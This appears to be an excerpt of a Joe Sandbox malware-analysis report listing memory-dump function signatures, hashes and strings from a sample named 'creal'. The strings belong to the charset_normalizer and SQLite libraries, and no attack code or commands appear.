                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.SuperWeirdWordPlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 1450464846-371468285
                                                                                                                                                                                                                • Opcode ID: 98918f0986896f26525c7bd9e5b43f4031bd6749c4d76523467727f76d4c2467
                                                                                                                                                                                                                • Instruction ID: dd8d4023b9a837d3309d79f59b14e6258d409a3c2d084027895f53c0bb10a43c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 98918f0986896f26525c7bd9e5b43f4031bd6749c4d76523467727f76d4c2467
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5411272A08B8286E718CF69E84036973B1FB48BC8F544135CA6C87768EF7DE595C342
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.ArchaicUpperLowerPlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 1450464846-353558827
                                                                                                                                                                                                                • Opcode ID: d9e477cc0f5dbe889ee029430d6b8f0b420a3cfa5d140793ed0a56d7501aa99d
                                                                                                                                                                                                                • Instruction ID: dad274a97d1dda650bbba7b79a67655d95aa7722cb3610e672d2e20b385d31d1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9e477cc0f5dbe889ee029430d6b8f0b420a3cfa5d140793ed0a56d7501aa99d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84314432A08B82C5E7448F69E84036973A5FB48BC8F540535CA6C87369EF7DE894C342
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.TooManySymbolOrPunctuationPlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 1450464846-3280324660
                                                                                                                                                                                                                • Opcode ID: a1ddc10de017addce63480acb8cb0cb49846706b3ca5f678430c59beec134696
                                                                                                                                                                                                                • Instruction ID: b05aa36df7c5d9fa2a5af997900716a3385cd2903f739d6d0ec99d640eadadcc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1ddc10de017addce63480acb8cb0cb49846706b3ca5f678430c59beec134696
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A313672A08B8285EB44CFA9E84036973A5FB48BC8F540435CA6C87768EF7DE595C342
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.SuspiciousDuplicateAccentPlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 1450464846-1506521901
                                                                                                                                                                                                                • Opcode ID: c9011ee015d9b478a68b666d2386e0bc45b2be7c5bf24e43dd3277610430b050
                                                                                                                                                                                                                • Instruction ID: 741f4b8e5d5be7a625607925dc1f44a8f83ed129ffc40e97d59c94630a370bf1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9011ee015d9b478a68b666d2386e0bc45b2be7c5bf24e43dd3277610430b050
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4314931A18B8285EB08CF59E84036D63A1FF48BC8F980531CA6C97764EF7DE550D342
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.SuspiciousRange$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 1450464846-880397153
                                                                                                                                                                                                                • Opcode ID: 49407b564c236b4001e082ae6d16e11313c9b7c79a02ae8e4e4803c904df55db
                                                                                                                                                                                                                • Instruction ID: a56fb16995510b2662ca1a0d099cd1d6b688a363928c008af525b84e8cdd657b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49407b564c236b4001e082ae6d16e11313c9b7c79a02ae8e4e4803c904df55db
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D312731A08B8285EB48CFA9E84036D63B1FB48BC8F940531CA6C87768EF7DE555C342
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.UnprintablePlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 1450464846-116036081
                                                                                                                                                                                                                • Opcode ID: 571f9f9e96768ffb2ac53c4efc93ddbf52cbfab833ec0306282c52c0bf4d27d3
                                                                                                                                                                                                                • Instruction ID: 80ba45e224dacce76500bb41d37b689562928f51bb3af1663d049294e0acd298
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 571f9f9e96768ffb2ac53c4efc93ddbf52cbfab833ec0306282c52c0bf4d27d3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD312832A08B8281EB44CF69E84136D63B1FB48BC8F944531DA6C87768EF7DE555D342
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.ArabicIsolatedFormPlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 1450464846-1141011871
                                                                                                                                                                                                                • Opcode ID: b59ea239b0ded2da1d7d86f123c67e001364e70b8c495ebd1fe9a254676c74a7
                                                                                                                                                                                                                • Instruction ID: 467e16f98dc164d75a540787a803fb1aa0c933983e61e160efc58ffb60bfa785
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b59ea239b0ded2da1d7d86f123c67e001364e70b8c495ebd1fe9a254676c74a7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41312972A09B8285EB44CF69E84036D63B1FB48BC8F540531DA6C87764EF7DE555C341
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_String
                                                                                                                                                                                                                • String ID: __init__$charset_normalizer.md.TooManyAccentuatedPlugin$interpreted classes cannot inherit from compiled
                                                                                                                                                                                                                • API String ID: 1450464846-2999409259
                                                                                                                                                                                                                • Opcode ID: 46a8908cafe4df30933cc1bf2f0944172b9d1b0b9ac90932bbe1890628880787
                                                                                                                                                                                                                • Instruction ID: c94d6e0f3d4586c7bdbca55944264f1c62fc61a8564c3e48e528c65264db6fd4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 46a8908cafe4df30933cc1bf2f0944172b9d1b0b9ac90932bbe1890628880787
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C313831A08B8285EB448F69E84036D63B1FB48BC8F940531DA6C8B768EF7DE555C741
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: SubtypeType_
                                                                                                                                                                                                                • String ID: charset_normalizer.md.MessDetectorPlugin$eligible$str
                                                                                                                                                                                                                • API String ID: 2891779845-1291782451
                                                                                                                                                                                                                • Opcode ID: 7f0862f8ed2a2bf7f8ea4440bfcb9bd23f6d9e60511077b2f04859b75fbf1be2
                                                                                                                                                                                                                • Instruction ID: aaf0b89263f0c5acc68be5d2e42f1991a58f7b4c20a3c8009fc09297656a16c9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f0862f8ed2a2bf7f8ea4440bfcb9bd23f6d9e60511077b2f04859b75fbf1be2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FD118161B08786C5EA289BD5D8953BD63A1BF45FD0F884035DD2D473A4EE2CE455C302
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocErr_String
                                                                                                                                                                                                                • String ID: 'ArchaicUpperLowerPlugin' object attribute '_last_alpha_seen' cannot be deleted$str or None
                                                                                                                                                                                                                • API String ID: 1259552197-1607602726
                                                                                                                                                                                                                • Opcode ID: 2eb1423d3a8d026875b47d3e487d8fbdb754b2b35a34fb420c45883b89527626
                                                                                                                                                                                                                • Instruction ID: e646bfab94d3bee18827208b245dfc86d29c500179216ffd84d0a5f0cfb82e3e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2eb1423d3a8d026875b47d3e487d8fbdb754b2b35a34fb420c45883b89527626
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F115172B08B46C6EF598B99E49537C63A1FB88BD4F484131DA2D47798EE3CE4908702
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocErr_String
                                                                                                                                                                                                                • String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_last_latin_character' cannot be deleted$str or None
                                                                                                                                                                                                                • API String ID: 1259552197-4111674009
                                                                                                                                                                                                                • Opcode ID: 45422d08dff3ba37862566774811d1c873494940e91693ae83718888786eb3b7
                                                                                                                                                                                                                • Instruction ID: 25f2fd6f34422b1f60ae9f7b9a13a56c3911983ad03699befb6e87d14073224f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45422d08dff3ba37862566774811d1c873494940e91693ae83718888786eb3b7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18117F72B08B46C6EE588B99E49037C23B0EF48BD8F484131DA2D47799EE2CE4908702
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocErr_String
                                                                                                                                                                                                                • String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_last_printable_char' cannot be deleted$str or None
                                                                                                                                                                                                                • API String ID: 1259552197-2331204894
                                                                                                                                                                                                                • Opcode ID: 4a2e56e4c18d021721d1ff58624d4138fa5cae7aafe6a9259ab8a3639d0b6b2d
                                                                                                                                                                                                                • Instruction ID: 3be08eae9cc61073f7a241cc93506d5dd9334fa7c6052a53413039e8aaec7943
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a2e56e4c18d021721d1ff58624d4138fa5cae7aafe6a9259ab8a3639d0b6b2d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B117C72B08B46C6EE488BA9E49033C63A0FB48FD4F884131DA2D4B795EE2CE4509702
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: SubtypeType_
                                                                                                                                                                                                                • String ID: charset_normalizer.md.MessDetectorPlugin$feed$str
                                                                                                                                                                                                                • API String ID: 2891779845-1310269896
                                                                                                                                                                                                                • Opcode ID: 174ffd5a8d4fbd5a7ace33c46627c3910e0e1c50ab3d8efb39f58c9a0e45e4fb
                                                                                                                                                                                                                • Instruction ID: 177f43e34ff18109c8c429a72547a8811d9d340dea7b6f9b69b2e8a2e58382fc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 174ffd5a8d4fbd5a7ace33c46627c3910e0e1c50ab3d8efb39f58c9a0e45e4fb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC114FA1A48746C5EB689BA6E8413BD6361BF45BC0F844031DD3D473A4EF2CE855C702
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4228545439-217463007
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4228545439-217463007
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4228545439-217463007
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4228545439-217463007
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Dealloc$Object_Vectorcall
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 1057673266-217463007
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Object_$DeallocErr_$ArgsAttrCallInstanceObjectOccurred
                                                                                                                                                                                                                • String ID: ratio
                                                                                                                                                                                                                • API String ID: 1598006454-4234197119
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_Format
                                                                                                                                                                                                                • String ID: %s object expected; and errored formatting real type!$%s object expected; got %U
                                                                                                                                                                                                                • API String ID: 376477240-2630277986
                                                                                                                                                                                                                • Opcode ID: 45f3feeb58d62d7b61bd12d7106d8e4dcb9e7cfdec48858d2051b2ab1d508661
                                                                                                                                                                                                                • Instruction ID: 29439ad72400e9b2358bf58f5cc8fd729dc1ffc8ba5d1441bba1760452fafb00
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 45f3feeb58d62d7b61bd12d7106d8e4dcb9e7cfdec48858d2051b2ab1d508661
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2F04921E08B82C1EA094BA6F98437C6362FF48BD4F885031DA2D47695EE6CE5809702
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1579606014.00007FF8E7141000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF8E7140000, based on PE: true
• Associated: 00000002.00000002.1579555627.00007FF8E7140000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579656071.00007FF8E7155000.00000002.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579759733.00007FF8E715B000.00000004.00000001.01000000.00000018.sdmp
• Associated: 00000002.00000002.1579833563.00007FF8E715F000.00000002.00000001.01000000.00000018.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e7140000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                • String ID: <module>
                                                                                                                                                                                                                • API String ID: 4228545439-217463007
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF8E68CEBA2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
• Associated: 00000002.00000002.1574114740.00007FF8E68B0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574437264.00007FF8E6A0A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000002.00000002.1574499928.00007FF8E6A0F000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 1475443563-3418467682
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 438689982-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: %s-shm$readonly_shm$winOpenShm
                                                                                                                                                                                                                • API String ID: 2221118986-2815843928
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,00000080,?,00000000,00007FF8E6945C02), ref: 00007FF8E69458DB
                                                                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,00000080,?,00000000,00007FF8E6945C02), ref: 00007FF8E6945959
                                                                                                                                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,00000080,?,00000000,00007FF8E6945C02), ref: 00007FF8E6945A4B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                • String ID: RETURNING may not use "TABLE.*" wildcards
                                                                                                                                                                                                                • API String ID: 3510742995-2313493979
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff8e68b0000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset
                                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                • API String ID: 2221118986-3418467682
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.1574168026.00007FF8E68B1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF8E68B0000, based on PE: true
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
